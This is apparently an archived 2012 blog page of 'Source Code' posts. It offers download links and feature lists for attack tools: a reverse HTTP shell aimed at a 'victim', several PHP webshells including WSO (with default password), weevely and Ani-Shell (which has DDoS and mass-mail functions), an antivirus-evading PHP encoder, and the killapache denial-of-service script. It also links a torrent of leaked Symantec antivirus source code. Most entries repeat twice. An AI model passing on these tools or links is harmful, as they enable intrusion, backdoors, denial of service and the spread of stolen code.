Tuesday, 3. April 2012
Building an HTTP shell with AES + Proxy Support in Python
Am Tuesday, 3. Apr 2012 im Topic 'Source Code'
Got a little bored today and decided to write a reverse HTTP shell in Python thats platform independent and supports AES encryption when passing information back and forth. So this works on Linux, OSX, and Windows. The shell also supports proxy settings as well. This Python shell will initiate a reverse connection out of the network and connect to the attacker machine via pure HTTP communications. It’s pretty straight forward on how it works. I’ve byte compiled the code so you do not need to have Python installed on the victim, it will simply run as a normal executable.
Download compiled shell.exe and all of the source code
https://www.secmaniac.com/files/encrypted_http_shell.zip
Download compiled shell.exe and all of the source code
https://www.secmaniac.com/files/encrypted_http_shell.zip
Monday, 2. April 2012
WSO 2.5 Webshell
Am Monday, 2. Apr 2012 im Topic 'Source Code'
This utility provides a Web interface for remote operation c operating system and its service / daemon.
Opportunity Description / features:
Authorization for cookies
Server Information
File manager (copy, rename, move, delete, chmod, touch, creating files and folders)
View, hexview, editing, downloading,
uploading files
Working with zip archives (packing, unpacking) + compression tar.gz
Console
SQL Manager (MySql, PostgreSql)
Execute PHP code
Working with Strings + hash search online databases
Bindport and back-Connect (Perl)
Bruteforce FTP, MySQL, PgSQL
Search files, search text in files
Support for * nix-like and Windows systems
Antipoiskovik (check User-Agent, if a search engine then returns 404 error)
You can use AJAX
Small size. The boxed version is 22.8 Kb
Choice of encoding, which employs a shell.
Info
Default password: root
(if you want to change it change the auth_pass variable value with your md5 encoded password.
http://pastebin.com/Qra8yeWX
Opportunity Description / features:
Authorization for cookies
Server Information
File manager (copy, rename, move, delete, chmod, touch, creating files and folders)
View, hexview, editing, downloading,
uploading files
Working with zip archives (packing, unpacking) + compression tar.gz
Console
SQL Manager (MySql, PostgreSql)
Execute PHP code
Working with Strings + hash search online databases
Bindport and back-Connect (Perl)
Bruteforce FTP, MySQL, PgSQL
Search files, search text in files
Support for * nix-like and Windows systems
Antipoiskovik (check User-Agent, if a search engine then returns 404 error)
You can use AJAX
Small size. The boxed version is 22.8 Kb
Choice of encoding, which employs a shell.
Info
Default password: root
(if you want to change it change the auth_pass variable value with your md5 encoded password.
http://pastebin.com/Qra8yeWX
Saturday, 31. March 2012
weevely - Stealth tiny web shell
Am Saturday, 31. Mar 2012 im Topic 'Source Code'
Weevely is a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and could be used like an hidden backdoor and as a useful telnet-like console replacement to manage web accounts, even if hosted in free hosting services. Just generate and upload the "server" PHP code on the target web server, and run Weevely client locally to transmit shell commands.
Download
http://code.google.com/p/weevely/downloads/list
Download
http://code.google.com/p/weevely/downloads/list
Friday, 23. March 2012
GooDork - Linux
Am Friday, 23. Mar 2012 im Topic 'Source Code'
GooDork is a simple collection of python scripts designed to bring the power of google dorking straight to your command line.
Info
https://github.com/k3170makan/GooDork/wiki
Download
https://github.com/k3170makan/GooDork
Doxing A hosting server using GooDork
http://pastebin.com/VU7NArKL
Info
https://github.com/k3170makan/GooDork/wiki
Download
https://github.com/k3170makan/GooDork
Doxing A hosting server using GooDork
http://pastebin.com/VU7NArKL
Monday, 19. March 2012
lshell - coded in Python
Am Monday, 19. Mar 2012 im Topic 'Source Code'
lshell is a shell coded in Python, that lets you restrict a user's environment to limited sets of commands, choose to enable/disable any command over SSH (e.g. SCP, SFTP, rsync, etc.), log user's commands, implement timing restriction, and more.
Download - Info
http://lshell.ghantoos.org/
Download - Info
http://lshell.ghantoos.org/
Thursday, 15. March 2012
Carbylamine PHP Encoder
Am Thursday, 15. Mar 2012 im Topic 'Source Code'
Carbylamine PHP Encoder is a PHP Encoder for obfuscating/encoding PHP files so that antivirus detection signatures can be bypassed. High Security PHP Encoder Stops unauthorized personnel from reading, modifying and reverse engineering your code.
Download
http://pastebin.com/ac8r3q81
by
Prakhar Prasad
Download
http://pastebin.com/ac8r3q81
by
Prakhar Prasad
12309.php - Webshell
Am Thursday, 15. Mar 2012 im Topic 'Source Code'
12309.php is advanced webshell with the main aim at executing shell commands in all possible ways. it has some additional functions though.
Download
https://github.com/kairn/12309.php
Download
https://github.com/kairn/12309.php
Friday, 9. March 2012
Symantec Norton AntiVirus 2006 All Platform Source Code
Am Friday, 9. Mar 2012 im Topic 'Source Code'
Typ:
Porno > Sonstiges
Dateien:
1
Größe:
1.07 GiB (1147711544 Bytes)
Tag(s):
Anonymous AntiSec LuLzSec
Qualität:
+5 / -0 (+5)
Hochgeladen:
2012-03-08 17:05:55 GMT
By:
Anonymous
Info Hash:
B1DEC26B69A7DD191451C29BCE83B74633293CE4
Download
http://thepiratebay.se/torrent/7087027/
Porno > Sonstiges
Dateien:
1
Größe:
1.07 GiB (1147711544 Bytes)
Tag(s):
Anonymous AntiSec LuLzSec
Qualität:
+5 / -0 (+5)
Hochgeladen:
2012-03-08 17:05:55 GMT
By:
Anonymous
Info Hash:
B1DEC26B69A7DD191451C29BCE83B74633293CE4
Download
http://thepiratebay.se/torrent/7087027/
Friday, 3. February 2012
Ani-Shell v1.5 - Final
Am Friday, 3. Feb 2012 im Topic 'Source Code'
Ani-Shell is a simple PHP shell with some unique features like Mass Mailer , A simple Web-Server Fuzzer , a DDoser etc! This shell has immense capabilities and have been written with some coding standards in mind for better editing and customization
Download
http://sourceforge.net/projects/ani-shell/
login : lionaneesh
pass : lionaneesh
Download
http://sourceforge.net/projects/ani-shell/
login : lionaneesh
pass : lionaneesh
Monday, 3. October 2011
killapache - PHP
Am Monday, 3. Oct 2011 im Topic 'Source Code'
How does above mentioned code works in killapache.
killapache sends GET requests with multiple “byte ranges” that will claim large portions of the system’s memory space. A “byte range” statement allows a browser to only load certain parts of a document, for example bytes 500 to 1000. It is normally used while downloading large files. This method is used by programs such as download clients to resume downloads that have been interrupted; it is designed to reduce bandwidth requirements. However, it appears that stating multiple unsorted components in the header can cause an Apache server to malfunction.
Download
http://pastebin.com/gWB76qmj
killapache sends GET requests with multiple “byte ranges” that will claim large portions of the system’s memory space. A “byte range” statement allows a browser to only load certain parts of a document, for example bytes 500 to 1000. It is normally used while downloading large files. This method is used by programs such as download clients to resume downloads that have been interrupted; it is designed to reduce bandwidth requirements. However, it appears that stating multiple unsorted components in the header can cause an Apache server to malfunction.
Download
http://pastebin.com/gWB76qmj
... ältere Einträge
